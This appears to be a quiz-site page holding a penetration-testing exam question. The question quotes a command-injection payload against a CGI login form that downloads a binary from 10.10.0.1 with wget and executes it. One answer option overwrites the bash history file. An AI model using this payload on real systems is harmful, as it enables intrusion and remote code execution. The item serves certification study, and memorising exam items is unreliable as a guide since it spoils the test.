A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = "POST " exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} - c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?
A) grep -v apache ~/.bash_history > ~/.bash_history
B) rm -rf /tmp/apache
C) chmod 600 /tmp/apache
D) taskkill /IM "apache" /F
Correct Answer:
Verified
Q15: Which of the following documents describes specific
Q16: Which of the following expressions in Python
Q17: A security engineer identified a new server
Q18: A company conducted a simulated phishing attack
Q19: Given the following output: User-agent:* Disallow: /author/
Q21: A penetration tester was conducting a penetration
Q22: A company becomes concerned when the security
Q23: Which of the following should a penetration
Q24: When preparing for an engagement with an
Q25: A penetration tester obtained the following results
Unlock this Answer For Free Now!
View this answer and more for free by performing one of the following actions
Scan the QR code to install the App and get 2 free unlocks
Unlock quizzes for free by uploading documents